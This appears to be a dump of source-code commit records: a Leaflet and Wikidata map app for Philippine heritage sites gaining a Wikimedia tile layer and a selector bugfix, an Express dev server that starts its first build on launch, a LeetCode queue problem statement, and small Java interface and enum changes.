BootstrapDataIsLoaded = false; // Whether the data needed to populate the map and index is loaded var PrimaryDataIsLoaded = false; // Whether the non-lazy data is loaded // ------------------------------------------------------------ window.addEventListener('load', init); // Initializes the app once the page has been loaded. function init() { initMap(); loadPrimaryData(); window.addEventListener('hashchange', processHashChange); Map.on('popupopen', function(e) { displayRecordDetails(e.popup._qid) }); } // Initializes the Leaflet-based map. 
function initMap() { // Create map and set initial view Map = new L.map('map'); Map.fitBounds([[MAX_PH_LAT, MAX_PH_LON], [MIN_PH_LAT, MIN_PH_LON]]); // Add tile layers let cartoLayer = new L.tileLayer(CARTO_LAYER_URL, { attribution : CARTO_LAYER_ATTRIBUTION, maxZoom : TILE_LAYER_MAX_ZOOM, }).addTo(Map); let wikiLayer = new L.tileLayer(WIKI_LAYER_URL, { attribution : WIKI_LAYER_ATTRIBUTION, maxZoom : TILE_LAYER_MAX_ZOOM, }); let osmLayer = new L.tileLayer(OSM_LAYER_URL, { attribution : OSM_LAYER_ATTRIBUTION, maxZoom : TILE_LAYER_MAX_ZOOM, }); let baseMaps = { 'CARTO Voyager' : cartoLayer, 'Wikimedia Maps' : wikiLayer, 'OpenStreetMap Carto' : osmLayer, }; L.control.layers(baseMaps, null, {position: 'topleft'}).addTo(Map); // Add powered by Wikidata map control let powered = L.control({ position: 'bottomleft' }); powered.onAdd = function(Map) { var divElem = L.DomUtil.create('div', 'powered'); divElem.innerHTML = '<a href="https://www.wikidata.org/"><img src="img/powered_by_wikidata.png"></a>'; return divElem; }; powered.addTo(Map); // Initialize the map marker cluster Cluster = new L.markerClusterGroup({ maxClusterRadius: function(z) { if (z <= 15) return 50; if (z === 16) return 40; if (z === 17) return 30; if (z === 18) return 20; if (z >= 19) return 10; }, }).addTo(Map); } // Given a SPARQL query string, a per-result processing callback, and an optional // post-processing callback, queries WDQS using the given query, parses the query // results and calls the per-result callback on each result, calls the // post-processing callback after all results have been processed, then returns // a promise that resolves after all the processing or rejects with an HTTP // error code if there is an error querying WDQS. If SparqlValuesClause is not false, // this also updates the given query with the SparqlValuesClause value prior to // querying WDQS. function queryWdqsThenProcess(query, processEachResult, postprocessCallback) { let promise = new Promise((resolve, reject) => { let xhr = new XMLHttpRequest(); xhr.onreadystatechange = function() { if (xhr.readyState !== xhr.DONE) return; if (xhr.status === 200) { resolve(JSON.parse(xhr.responseText)); } else { reject(xhr.status); } }; xhr.open('POST', WDQS_API_URL, true); xhr.overrideMimeType('text/plain'); xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded'); if (SparqlValuesClause) query = query.replace('<SPARQLVALUESCLAUSE>', SparqlValuesClause); xhr.send('format=json&query=' + encodeURIComponent(query)); }); promise = promise.then(data => { data.results.bindings.forEach(processEachResult); }); if (postprocessCallback) promise = promise.then(postprocessCallback); return promise; } // Enables the app. Should be called after the Wikidata queries have been processed. function enableApp() { PrimaryDataIsLoaded = true; processHashChange(); } // Event handler that handles any change in the window URL hash. When all the // data is loaded, this updates the correct panel section and window title and // optionally updates the map to the relevant location. Otherwise, the panel // contents will show a loading indicator and the window will be the basic title. // This is also called when data has been progressively loaded in order // to update the panel during app initialization. 
function processHashChange() { let fragment = window.location.hash.replace('#', ''); if (fragment === 'about') { document.title = 'About – ' + BASE_TITLE; displayPanelContent('about'); } else { if (!BootstrapDataIsLoaded) { displayPanelContent('loading'); } else { if (fragment === '' || !(fragment in Records)) { window.location.hash = ''; // Disable invalid fragments document.title = BASE_TITLE; displayPanelContent('index'); } else { activateMapMarker(fragment); displayRecordDetails(fragment); } } } } // Given a record QID, if the record has a map marker, updates the map to show // and center on the map marker and open its popup if needed. function activateMapMarker(qid) { let record = Records[qid]; if (!record.mapMarker) return; // Some records (grouped heritage sites) don't have markers Cluster.zoomToShowLayer( record.mapMarker, function() { Map.setView([record.lat, record.lon], Map.getZoom()); if (!record.popup.isOpen()) record.mapMarker.openPopup(); }, ); } // Given the ID of the panel content ID, displays the corresponding // panel content and updates the navigation menu state as well. function displayPanelContent(id) { document.querySelectorAll('.panel-content').forEach(content => { content.style.display = (content.id === id) ? content.dataset.display : 'none'; }); document.querySelectorAll('nav li').forEach(li => { if (li.childNodes[0].getAttribute('href') === '#' + id) { li.classList.add('selected'); } else { li.classList.remove('selected'); } }); } // Given a record QID, displays the record's details on the side panel, // generating it as needed. Also updates the window title and URL hash. // If the primary data is not yet loaded, shows the loading panel. function displayRecordDetails(qid) { let record = Records[qid]; window.location.hash = `#${qid}`; document.title = `${record.indexTitle} – ${BASE_TITLE}` if (PrimaryDataIsLoaded) { if (!record.panelElem) generateRecordDetails(qid); let detailsElem = document.getElementById('details'); detailsElem.replaceChild(record.panelElem, detailsElem.childNodes[0]); displayPanelContent('details'); } else { displayPanelContent('loading'); } } // Given a Commons image filename and an array of class names, generates // a figure HTML string, returns it, and calls the Commons API to fetch // and insert the image attribution if needed. If the filename is false, // the figure element will indicate "No photo available". function generateFigure(filename, classNames = []) { if (filename) { // Fetch the image attribution asynchronously then add it to the figure element loadJsonp( COMMONS_API_URL, { action : 'query', format : 'json', prop : 'imageinfo', iiprop : 'extmetadata', titles : 'File:' + filename, }, function(data) { let pageId = Object.keys(data.query.pages)[0]; let metadata = data.query.pages[pageId].imageinfo[0].extmetadata; let artistHtml = metadata.Artist.value; if (artistHtml.search('href="//') >= 0) { artistHtml = artistHtml.replace(/href="(?:https?:)?\/\//, 'href="https://'); } let licenseHtml = ''; if ('AttributionRequired' in metadata && metadata.AttributionRequired.value === 'true') { licenseHtml = metadata.LicenseShortName.value.replace(/ /g, '&nbsp;'); licenseHtml = licenseHtml.replace(/-/g, '&#8209;'); licenseHtml = `[${licenseHtml}]`; if ('LicenseUrl' in metadata) { licenseHtml = `<a href="${metadata.LicenseUrl.value}">${licenseHtml}</a>`; } licenseHtml = ' ' + licenseHtml; } let selector = `figure${classNames.length ? '.' 
: ''}${classNames.join('.')} figcaption`; document.querySelector(selector).innerHTML = artistHtml + licenseHtml; } ); return ( `<figure class="${classNames.join(' ')}">` + `<a href="${COMMONS_WIKI_URL_PREF}File:${filename}">` + `<img class="loading" src="${COMMONS_WIKI_URL_PREF}Special:FilePath/${filename}?width=300" alt="" onload="this.className=''">` + '</a>' + '<figcaption>(Loading…)</figcaption>' + '</figure>' ); } else { return `<figure class="${classNames.join(' ')} nodata">No photo available</figure>`; } } // Given a WDQS query result image data, returns the base image filename. function extractImageFilename(image) { let regex = /https?:\/\/commons\.wikimedia\.org\/wiki\/Special:FilePath\//; return decodeURIComponent(image.value.replace(regex, '')); } // Given a WDQS result record and key name, takes the date value based on // the key name and then returns a formatted date string. function parseDate(result, keyName) { let dateVal = result[keyName].value; if (result[keyName + 'Precision'].value === YEAR_PRECISION) { return dateVal.substr(0, 4); } else { let date = new Date(dateVal); return date.toLocaleDateString( 'en-US', { month : 'long', day : 'numeric', year : 'numeric', }, ); } }
js/eph-common.js
'use strict'; // Constants and fixed parameters const WDQS_API_URL = 'https://query.wikidata.org/sparql'; const COMMONS_WIKI_URL_PREF = 'https://commons.wikimedia.org/wiki/'; const COMMONS_API_URL = 'https://commons.wikimedia.org/w/api.php'; const YEAR_PRECISION = '9'; const PH_QID = 'Q928'; const REGION_QID = 'Q24698'; const PROVINCE_QID = 'Q24746'; const HUC_QID = 'Q29946056'; const CITY_QID = 'Q104157'; const ADMIN_QIDS = [REGION_QID, PROVINCE_QID, HUC_QID, CITY_QID]; const ADMIN_LEVELS = 4; const OSM_LAYER_URL = 'https://{s}.tile.openstreetmap.org/{z}/{x}/{y}.png'; const OSM_LAYER_ATTRIBUTION = 'Base map &copy; <a href="https://www.openstreetmap.org/copyright">OpenStreetMap contributors</a>'; const CARTO_LAYER_URL = 'https://cartodb-basemaps-{s}.global.ssl.fastly.net/rastertiles/voyager_labels_under/{z}/{x}/{y}{r}.png'; const CARTO_LAYER_ATTRIBUTION = 'Base map &copy; <a href="https://www.openstreetmap.org/copyright">OpenStreetMap contributors</a> (data), <a href="https://carto.com/">CARTO</a> (style)'; const TILE_LAYER_MAX_ZOOM = 19; const MIN_PH_LAT = 4.5; const MAX_PH_LAT = 21.0; const MIN_PH_LON = 116.5; const MAX_PH_LON = 126.5; // Globals var Records = {}; // Main app database, keyed by QID var SparqlValuesClause; // SPARQL "VALUES" clause containing the QIDs of all main Wikidata items var Map; // Leaflet map object var Cluster; // Leaflet map cluster var BootstrapDataIsLoaded = false; // Whether the data needed to populate the map and index is loaded var PrimaryDataIsLoaded = false; // Whether the non-lazy data is loaded // ------------------------------------------------------------ window.addEventListener('load', init); // Initializes the app once the page has been loaded. function init() { initMap(); loadPrimaryData(); window.addEventListener('hashchange', processHashChange); Map.on('popupopen', function(e) { displayRecordDetails(e.popup._qid) }); } // Initializes the Leaflet-based map. function initMap() { // Create map and set initial view Map = new L.map('map'); Map.fitBounds([[MAX_PH_LAT, MAX_PH_LON], [MIN_PH_LAT, MIN_PH_LON]]); // Add tile layers let osmLayer = new L.tileLayer(OSM_LAYER_URL, { attribution : OSM_LAYER_ATTRIBUTION, maxZoom : TILE_LAYER_MAX_ZOOM, }) let cartoLayer = new L.tileLayer(CARTO_LAYER_URL, { attribution : CARTO_LAYER_ATTRIBUTION, maxZoom : TILE_LAYER_MAX_ZOOM, }).addTo(Map); let baseMaps = { 'CARTO Voyager' : cartoLayer, 'OpenStreetMap Carto' : osmLayer, }; L.control.layers(baseMaps, null, {position: 'topleft'}).addTo(Map); // Add powered by Wikidata map control let powered = L.control({ position: 'bottomleft' }); powered.onAdd = function(Map) { var divElem = L.DomUtil.create('div', 'powered'); divElem.innerHTML = '<a href="https://www.wikidata.org/"><img src="img/powered_by_wikidata.png"></a>'; return divElem; }; powered.addTo(Map); // Initialize the map marker cluster Cluster = new L.markerClusterGroup({ maxClusterRadius: function(z) { if (z <= 15) return 50; if (z === 16) return 40; if (z === 17) return 30; if (z === 18) return 20; if (z >= 19) return 10; }, }).addTo(Map); } // Given a SPARQL query string, a per-result processing callback, and an optional // post-processing callback, queries WDQS using the given query, parses the query // results and calls the per-result callback on each result, calls the // post-processing callback after all results have been processed, then returns // a promise that resolves after all the processing or rejects with an HTTP // error code if there is an error querying WDQS. 
If SparqlValuesClause is not false, // this also updates the given query with the SparqlValuesClause value prior to // querying WDQS. function queryWdqsThenProcess(query, processEachResult, postprocessCallback) { let promise = new Promise((resolve, reject) => { let xhr = new XMLHttpRequest(); xhr.onreadystatechange = function() { if (xhr.readyState !== xhr.DONE) return; if (xhr.status === 200) { resolve(JSON.parse(xhr.responseText)); } else { reject(xhr.status); } }; xhr.open('POST', WDQS_API_URL, true); xhr.overrideMimeType('text/plain'); xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded'); if (SparqlValuesClause) query = query.replace('<SPARQLVALUESCLAUSE>', SparqlValuesClause); xhr.send('format=json&query=' + encodeURIComponent(query)); }); promise = promise.then(data => { data.results.bindings.forEach(processEachResult); }); if (postprocessCallback) promise = promise.then(postprocessCallback); return promise; } // Enables the app. Should be called after the Wikidata queries have been processed. function enableApp() { PrimaryDataIsLoaded = true; processHashChange(); } // Event handler that handles any change in the window URL hash. When all the // data is loaded, this updates the correct panel section and window title and // optionally updates the map to the relevant location. Otherwise, the panel // contents will show a loading indicator and the window will be the basic title. // This is also called when data has been progressively loaded in order // to update the panel during app initialization. function processHashChange() { let fragment = window.location.hash.replace('#', ''); if (fragment === 'about') { document.title = 'About – ' + BASE_TITLE; displayPanelContent('about'); } else { if (!BootstrapDataIsLoaded) { displayPanelContent('loading'); } else { if (fragment === '' || !(fragment in Records)) { window.location.hash = ''; // Disable invalid fragments document.title = BASE_TITLE; displayPanelContent('index'); } else { activateMapMarker(fragment); displayRecordDetails(fragment); } } } } // Given a record QID, if the record has a map marker, updates the map to show // and center on the map marker and open its popup if needed. function activateMapMarker(qid) { let record = Records[qid]; if (!record.mapMarker) return; // Some records (grouped heritage sites) don't have markers Cluster.zoomToShowLayer( record.mapMarker, function() { Map.setView([record.lat, record.lon], Map.getZoom()); if (!record.popup.isOpen()) record.mapMarker.openPopup(); }, ); } // Given the ID of the panel content ID, displays the corresponding // panel content and updates the navigation menu state as well. function displayPanelContent(id) { document.querySelectorAll('.panel-content').forEach(content => { content.style.display = (content.id === id) ? content.dataset.display : 'none'; }); document.querySelectorAll('nav li').forEach(li => { if (li.childNodes[0].getAttribute('href') === '#' + id) { li.classList.add('selected'); } else { li.classList.remove('selected'); } }); } // Given a record QID, displays the record's details on the side panel, // generating it as needed. Also updates the window title and URL hash. // If the primary data is not yet loaded, shows the loading panel. 
function displayRecordDetails(qid) { let record = Records[qid]; window.location.hash = `#${qid}`; document.title = `${record.indexTitle} – ${BASE_TITLE}` if (PrimaryDataIsLoaded) { if (!record.panelElem) generateRecordDetails(qid); let detailsElem = document.getElementById('details'); detailsElem.replaceChild(record.panelElem, detailsElem.childNodes[0]); displayPanelContent('details'); } else { displayPanelContent('loading'); } } // Given a Commons image filename and an array of class names, generates // a figure HTML string, returns it, and calls the Commons API to fetch // and insert the image attribution if needed. If the filename is false, // the figure element will indicate "No photo available". function generateFigure(filename, classNames = []) { if (filename) { // Fetch the image attribution asynchronously then add it to the figure element loadJsonp( COMMONS_API_URL, { action : 'query', format : 'json', prop : 'imageinfo', iiprop : 'extmetadata', titles : 'File:' + filename, }, function(data) { let pageId = Object.keys(data.query.pages)[0]; let metadata = data.query.pages[pageId].imageinfo[0].extmetadata; let artistHtml = metadata.Artist.value; if (artistHtml.search('href="//') >= 0) { artistHtml = artistHtml.replace(/href="(?:https?:)?\/\//, 'href="https://'); } let licenseHtml = ''; if ('AttributionRequired' in metadata && metadata.AttributionRequired.value === 'true') { licenseHtml = metadata.LicenseShortName.value.replace(/ /g, '&nbsp;'); licenseHtml = licenseHtml.replace(/-/g, '&#8209;'); licenseHtml = `[${licenseHtml}]`; if ('LicenseUrl' in metadata) { licenseHtml = `<a href="${metadata.LicenseUrl.value}">${licenseHtml}</a>`; } licenseHtml = ' ' + licenseHtml; } document.querySelector(`figure.${classNames.join('.')} figcaption`).innerHTML = artistHtml + licenseHtml; } ); return ( `<figure class="${classNames.join(' ')}">` + `<a href="${COMMONS_WIKI_URL_PREF}File:${filename}">` + `<img class="loading" src="${COMMONS_WIKI_URL_PREF}Special:FilePath/${filename}?width=300" alt="" onload="this.className=''">` + '</a>' + '<figcaption>(Loading…)</figcaption>' + '</figure>' ); } else { return `<figure class="${classNames.join(' ')} nodata">No photo available</figure>`; } } // Given a WDQS query result image data, returns the base image filename. function extractImageFilename(image) { let regex = /https?:\/\/commons\.wikimedia\.org\/wiki\/Special:FilePath\//; return decodeURIComponent(image.value.replace(regex, '')); } // Given a WDQS result record and key name, takes the date value based on // the key name and then returns a formatted date string. function parseDate(result, keyName) { let dateVal = result[keyName].value; if (result[keyName + 'Precision'].value === YEAR_PRECISION) { return dateVal.substr(0, 4); } else { let date = new Date(dateVal); return date.toLocaleDateString( 'en-US', { month : 'long', day : 'numeric', year : 'numeric', }, ); } }
Add Wikimedia Maps tile layer; port bugfix from Heritage Sites Map
js/eph-common.js
Add Wikimedia Maps tile layer; port bugfix from Heritage Sites Map
<ide><path>s/eph-common.js <ide> const OSM_LAYER_ATTRIBUTION = 'Base map &copy; <a href="https://www.openstreetmap.org/copyright">OpenStreetMap contributors</a>'; <ide> const CARTO_LAYER_URL = 'https://cartodb-basemaps-{s}.global.ssl.fastly.net/rastertiles/voyager_labels_under/{z}/{x}/{y}{r}.png'; <ide> const CARTO_LAYER_ATTRIBUTION = 'Base map &copy; <a href="https://www.openstreetmap.org/copyright">OpenStreetMap contributors</a> (data), <a href="https://carto.com/">CARTO</a> (style)'; <add>const WIKI_LAYER_URL = 'https://maps.wikimedia.org/osm-intl/{z}/{x}/{y}{r}.png'; <add>const WIKI_LAYER_ATTRIBUTION = 'Base map &copy; <a href="https://www.openstreetmap.org/copyright">OpenStreetMap contributors</a> (data), <a href="https://carto.com/">Wikimedia Foundation</a> (style)'; <ide> const TILE_LAYER_MAX_ZOOM = 19; <ide> const MIN_PH_LAT = 4.5; <ide> const MAX_PH_LAT = 21.0; <ide> Map.fitBounds([[MAX_PH_LAT, MAX_PH_LON], [MIN_PH_LAT, MIN_PH_LON]]); <ide> <ide> // Add tile layers <del> let osmLayer = new L.tileLayer(OSM_LAYER_URL, { <del> attribution : OSM_LAYER_ATTRIBUTION, <del> maxZoom : TILE_LAYER_MAX_ZOOM, <del> }) <ide> let cartoLayer = new L.tileLayer(CARTO_LAYER_URL, { <ide> attribution : CARTO_LAYER_ATTRIBUTION, <ide> maxZoom : TILE_LAYER_MAX_ZOOM, <ide> }).addTo(Map); <add> let wikiLayer = new L.tileLayer(WIKI_LAYER_URL, { <add> attribution : WIKI_LAYER_ATTRIBUTION, <add> maxZoom : TILE_LAYER_MAX_ZOOM, <add> }); <add> let osmLayer = new L.tileLayer(OSM_LAYER_URL, { <add> attribution : OSM_LAYER_ATTRIBUTION, <add> maxZoom : TILE_LAYER_MAX_ZOOM, <add> }); <ide> let baseMaps = { <ide> 'CARTO Voyager' : cartoLayer, <add> 'Wikimedia Maps' : wikiLayer, <ide> 'OpenStreetMap Carto' : osmLayer, <ide> }; <ide> L.control.layers(baseMaps, null, {position: 'topleft'}).addTo(Map); <ide> } <ide> licenseHtml = ' ' + licenseHtml; <ide> } <del> document.querySelector(`figure.${classNames.join('.')} figcaption`).innerHTML = artistHtml + licenseHtml; <add> let selector = `figure${classNames.length ? '.' : ''}${classNames.join('.')} figcaption`; <add> document.querySelector(selector).innerHTML = artistHtml + licenseHtml; <ide> } <ide> ); <ide>
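The second hunk above is the ported bugfix: the old template always inserted a dot after "figure", so calling generateFigure with no class names produced the selector "figure. figcaption", which querySelector rejects as invalid. A standalone sketch of the corrected selector construction (the class names below are made up):

function buildCaptionSelector(classNames) {
    // Insert the "." only when there are classes to join, so an empty list
    // yields "figure figcaption" instead of the invalid "figure. figcaption".
    return `figure${classNames.length ? '.' : ''}${classNames.join('.')} figcaption`;
}

console.log(buildCaptionSelector([]));                // figure figcaption
console.log(buildCaptionSelector(['main', 'wide']));  // figure.main.wide figcaption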
JavaScript
mit
87df87657ae22a0ba5ca7b13fb23ccf93929c17a
0
gessojs/gessojs,gessojs/gessojs
var path = require('path'); var nunjucks = require('nunjucks'); var express = require('express'); var build = require('./build'); var settings = require('./settings'); function createApp(watcher) { // Express application var app = express(); // Attach watcher app.watcher = watcher || null; // Middleware app.use(express.static(path.join(__dirname, 'public'))); // Configure extensions nunjucks.configure(path.join(__dirname, 'views')); // Routes app.get('/', function(req, res) { watcher.whenReady(function() { var canvasClass = settings.CANVAS_CLASS; var canvasWidth = settings.CANVAS_WIDTH; var canvasHeight = settings.CANVAS_HEIGHT; // TODO: Get values from project settings res.end(nunjucks.render('index.html', { canvasClass: canvasClass, canvasWidth: canvasWidth, canvasHeight: canvasHeight })); }); }); return app; } function serve(packagePath) { // TODO: Resolve root path if (!packagePath) { packagePath = process.cwd(); } // Create the watcher var watcher = build.watch(packagePath); // Create the app var app = createApp(watcher); // Run the server app.listen(settings.PORT, settings.HOST, function() { console.log(' * Listening on http://%s:%d/', settings.HOST, settings.PORT); // Start first build watcher.rebuild(); }); return app; } module.exports = { createApp: createApp, serve: serve };
gesso/server.js
var path = require('path'); var nunjucks = require('nunjucks'); var express = require('express'); var build = require('./build'); var settings = require('./settings'); function createApp(watcher) { // Express application var app = express(); // Attach watcher app.watcher = watcher || null; // Middleware app.use(express.static(path.join(__dirname, 'public'))); // Configure extensions nunjucks.configure(path.join(__dirname, 'views')); // Routes app.get('/', function(req, res) { watcher.whenReady(function() { var canvasClass = settings.CANVAS_CLASS; var canvasWidth = settings.CANVAS_WIDTH; var canvasHeight = settings.CANVAS_HEIGHT; // TODO: Get values from project settings res.end(nunjucks.render('index.html', { canvasClass: canvasClass, canvasWidth: canvasWidth, canvasHeight: canvasHeight })); }); }); return app; } function serve(packagePath) { // TODO: Resolve root path if (!packagePath) { packagePath = process.cwd(); } // Create the watcher var watcher = build.watch(packagePath); // Create the app var app = createApp(watcher); // Run the server app.listen(settings.PORT, settings.HOST, function() { console.log(' * Listening on http://%s:%d/', settings.HOST, settings.PORT); }); return app; } module.exports = { createApp: createApp, serve: serve };
Run build when first serving.
gesso/server.js
Run build when first serving.
<ide><path>gesso/server.js <ide> // Run the server <ide> app.listen(settings.PORT, settings.HOST, function() { <ide> console.log(' * Listening on http://%s:%d/', settings.HOST, settings.PORT); <add> // Start first build <add> watcher.rebuild(); <ide> }); <ide> <ide> return app;
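The change above starts the first build from inside the listen callback, so a build kicks off as soon as the server is accepting connections instead of waiting for the first file change. A stripped-down sketch of that startup order, with a stubbed watcher standing in for gesso's real build watcher:

var express = require('express');

function serve(watcher, port) {
    var app = express();
    app.get('/', function (req, res) { res.end('ok'); });
    app.listen(port, function () {
        console.log(' * Listening on http://localhost:%d/', port);
        watcher.rebuild(); // start the first build only once the server is up
    });
    return app;
}

serve({ rebuild: function () { console.log('starting first build'); } }, 3000);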
Java
mit
error: pathspec 'leetcode/java/prob232ImplementQueueUsing2Stacks/MyQueue.java' did not match any file(s) known to git
8032c0173a1c8ef52bc1749e6af4455eaaf00cb3
1
AmadouSallah/Programming-Interview-Questions,AmadouSallah/Programming-Interview-Questions
/* Problem 232: Implement Queue using Stacks Implement the following operations of a queue using stacks. push(x) -- Push element x to the back of queue. pop() -- Removes the element from in front of queue. peek() -- Get the front element. empty() -- Return whether the queue is empty. Notes: You must use only standard operations of a stack -- which means only push to top, peek/pop from top, size, and is empty operations are valid. Depending on your language, stack may not be supported natively. You may simulate a stack by using a list or deque (double-ended queue), as long as you use only standard operations of a stack. You may assume that all operations are valid (for example, no pop or peek operations will be called on an empty queue). */
leetcode/java/prob232ImplementQueueUsing2Stacks/MyQueue.java
Added problem statement to MyQueue.java
leetcode/java/prob232ImplementQueueUsing2Stacks/MyQueue.java
Added problem statement to MyQueue.java
<ide><path>leetcode/java/prob232ImplementQueueUsing2Stacks/MyQueue.java <add>/* <add>Problem 232: Implement Queue using Stacks <add> <add>Implement the following operations of a queue using stacks. <add> <add>push(x) -- Push element x to the back of queue. <add>pop() -- Removes the element from in front of queue. <add>peek() -- Get the front element. <add>empty() -- Return whether the queue is empty. <add> <add>Notes: <add>You must use only standard operations of a stack -- which means only push <add>to top, peek/pop from top, size, and is empty operations are valid. <add>Depending on your language, stack may not be supported natively. You may <add>simulate a stack by using a list or deque (double-ended queue), <add>as long as you use only standard operations of a stack. <add>You may assume that all operations are valid (for example, no pop <add>or peek operations will be called on an empty queue). <add>*/
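The commit above adds only the problem-statement comment; no implementation is included. As a sketch of the classic two-stack approach (written here in JavaScript, with arrays used strictly as stacks via push/pop/length), new elements land on an input stack and are drained into an output stack whenever the front of the queue is needed, which makes pop and peek amortized O(1):

function MyQueue() {
    this.inStack = [];   // receives newly pushed elements
    this.outStack = [];  // serves elements in FIFO order
}

MyQueue.prototype._drain = function () {
    // Refill the output stack only when it is empty, reversing the input stack's order.
    if (this.outStack.length === 0) {
        while (this.inStack.length > 0) this.outStack.push(this.inStack.pop());
    }
};

MyQueue.prototype.push = function (x) { this.inStack.push(x); };
MyQueue.prototype.pop = function () { this._drain(); return this.outStack.pop(); };
MyQueue.prototype.peek = function () { this._drain(); return this.outStack[this.outStack.length - 1]; };
MyQueue.prototype.empty = function () { return this.inStack.length === 0 && this.outStack.length === 0; };

var q = new MyQueue();
q.push(1); q.push(2);
console.log(q.peek());  // 1
console.log(q.pop());   // 1
console.log(q.empty()); // false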
Java
lgpl-2.1
error: pathspec 'src/org/concord/framework/data/DataDimension.java' did not match any file(s) known to git
b032db776991db463b59b6f0acc2c9160deda218
1
concord-consortium/framework
package org.concord.framework.data; /** * @author dima * */ public interface DataDimension { String getDimension(); void setDimension(String dimension); }
src/org/concord/framework/data/DataDimension.java
*** empty log message *** git-svn-id: fdf63cc6b6871a635be2b727c8623e4c3a9a9ed7@998 6e01202a-0783-4428-890a-84243c50cc2b
src/org/concord/framework/data/DataDimension.java
*** empty log message ***
<ide><path>src/org/concord/framework/data/DataDimension.java <add>package org.concord.framework.data; <add> <add>/** <add> * @author dima <add> * <add> */ <add>public interface DataDimension { <add> String getDimension(); <add> void setDimension(String dimension); <add>}
Java
mit
ae1a6bcafe165557f9af7903dd976fd37d73a22a
0
InnovateUKGitHub/innovation-funding-service,InnovateUKGitHub/innovation-funding-service,InnovateUKGitHub/innovation-funding-service,InnovateUKGitHub/innovation-funding-service,InnovateUKGitHub/innovation-funding-service
package org.innovateuk.ifs.application.resource; import com.google.common.collect.ImmutableSet; import com.google.common.collect.Sets; import org.innovateuk.ifs.workflow.resource.ProcessState; import org.innovateuk.ifs.workflow.resource.State; import java.util.List; import static org.innovateuk.ifs.util.CollectionFunctions.simpleMap; public enum ApplicationState implements ProcessState { CREATED(State.CREATED, "Created"), // initial state SUBMITTED(State.SUBMITTED, "Submitted"), INELIGIBLE(State.NOT_APPLICABLE, "Ineligible"), INELIGIBLE_INFORMED(State.NOT_APPLICABLE_INFORMED, "Ineligible Informed"), APPROVED(State.ACCEPTED, "Approved"), REJECTED(State.REJECTED, "Rejected"), OPEN(State.OPEN, "Open"), IN_PANEL(State.IN_PANEL, "In Panel"); final State backingState; private String displayName; public static final ImmutableSet<ApplicationState> submittedStates = Sets.immutableEnumSet(ApplicationState.SUBMITTED, ApplicationState.INELIGIBLE, ApplicationState.APPROVED, ApplicationState.REJECTED, ApplicationState.INELIGIBLE_INFORMED); ApplicationState(State backingState, String displayName) { this.backingState = backingState; this.displayName = displayName; } /* ApplicationState(State backingState) { this.backingState = backingState; } */ public String getStateName() { return backingState.name(); } public State getBackingState() { return backingState; } public String getDisplayName() { return displayName; } public static List<State> getBackingStates() { return simpleMap(ApplicationState.values(), ProcessState::getBackingState); } public static ApplicationState fromState(State state) { return ProcessState.fromState(ApplicationState.values(), state); } }
ifs-resources/src/main/java/org/innovateuk/ifs/application/resource/ApplicationState.java
package org.innovateuk.ifs.application.resource; import com.google.common.collect.ImmutableSet; import com.google.common.collect.Sets; import org.innovateuk.ifs.workflow.resource.ProcessState; import org.innovateuk.ifs.workflow.resource.State; import java.util.List; import static org.innovateuk.ifs.util.CollectionFunctions.simpleMap; public enum ApplicationState implements ProcessState { CREATED(State.CREATED), // initial state SUBMITTED(State.SUBMITTED), INELIGIBLE(State.NOT_APPLICABLE), INELIGIBLE_INFORMED(State.NOT_APPLICABLE_INFORMED), APPROVED(State.ACCEPTED), REJECTED(State.REJECTED), OPEN(State.OPEN), IN_PANEL(State.IN_PANEL); final State backingState; public static final ImmutableSet<ApplicationState> submittedStates = Sets.immutableEnumSet(ApplicationState.SUBMITTED, ApplicationState.INELIGIBLE, ApplicationState.APPROVED, ApplicationState.REJECTED, ApplicationState.INELIGIBLE_INFORMED); ApplicationState(State backingState) { this.backingState = backingState; } public String getStateName() { return backingState.name(); } public State getBackingState() { return backingState; } public static List<State> getBackingStates() { return simpleMap(ApplicationState.values(), ProcessState::getBackingState); } public static ApplicationState fromState(State state) { return ProcessState.fromState(ApplicationState.values(), state); } }
IFS-2904-CSS-Search-Application-Number Application State Changes for demo purpose for Andy. Change-Id: I5ba573fb4d507c45dcc8888477eaac661149f004
ifs-resources/src/main/java/org/innovateuk/ifs/application/resource/ApplicationState.java
IFS-2904-CSS-Search-Application-Number
<ide><path>fs-resources/src/main/java/org/innovateuk/ifs/application/resource/ApplicationState.java <ide> import static org.innovateuk.ifs.util.CollectionFunctions.simpleMap; <ide> <ide> public enum ApplicationState implements ProcessState { <del> CREATED(State.CREATED), // initial state <del> SUBMITTED(State.SUBMITTED), <del> INELIGIBLE(State.NOT_APPLICABLE), <del> INELIGIBLE_INFORMED(State.NOT_APPLICABLE_INFORMED), <del> APPROVED(State.ACCEPTED), <del> REJECTED(State.REJECTED), <del> OPEN(State.OPEN), <del> IN_PANEL(State.IN_PANEL); <add> CREATED(State.CREATED, "Created"), // initial state <add> SUBMITTED(State.SUBMITTED, "Submitted"), <add> INELIGIBLE(State.NOT_APPLICABLE, "Ineligible"), <add> INELIGIBLE_INFORMED(State.NOT_APPLICABLE_INFORMED, "Ineligible Informed"), <add> APPROVED(State.ACCEPTED, "Approved"), <add> REJECTED(State.REJECTED, "Rejected"), <add> OPEN(State.OPEN, "Open"), <add> IN_PANEL(State.IN_PANEL, "In Panel"); <add> <ide> final State backingState; <add> private String displayName; <ide> <ide> public static final ImmutableSet<ApplicationState> submittedStates = Sets.immutableEnumSet(ApplicationState.SUBMITTED, <ide> ApplicationState.INELIGIBLE, <ide> ApplicationState.REJECTED, <ide> ApplicationState.INELIGIBLE_INFORMED); <ide> <add> ApplicationState(State backingState, String displayName) { <add> this.backingState = backingState; <add> this.displayName = displayName; <add> } <add> <add>/* <ide> ApplicationState(State backingState) { <ide> this.backingState = backingState; <ide> } <add>*/ <ide> <ide> public String getStateName() { <ide> return backingState.name(); <ide> <ide> public State getBackingState() { <ide> return backingState; <add> } <add> <add> public String getDisplayName() { <add> return displayName; <ide> } <ide> <ide> public static List<State> getBackingStates() {
Java
apache-2.0
c64b6e6e6ad06c8d1832188e652345a4b19db7c2
0
marklogic/java-client-api,marklogic/java-client-api,marklogic/java-client-api,marklogic/java-client-api,marklogic/java-client-api
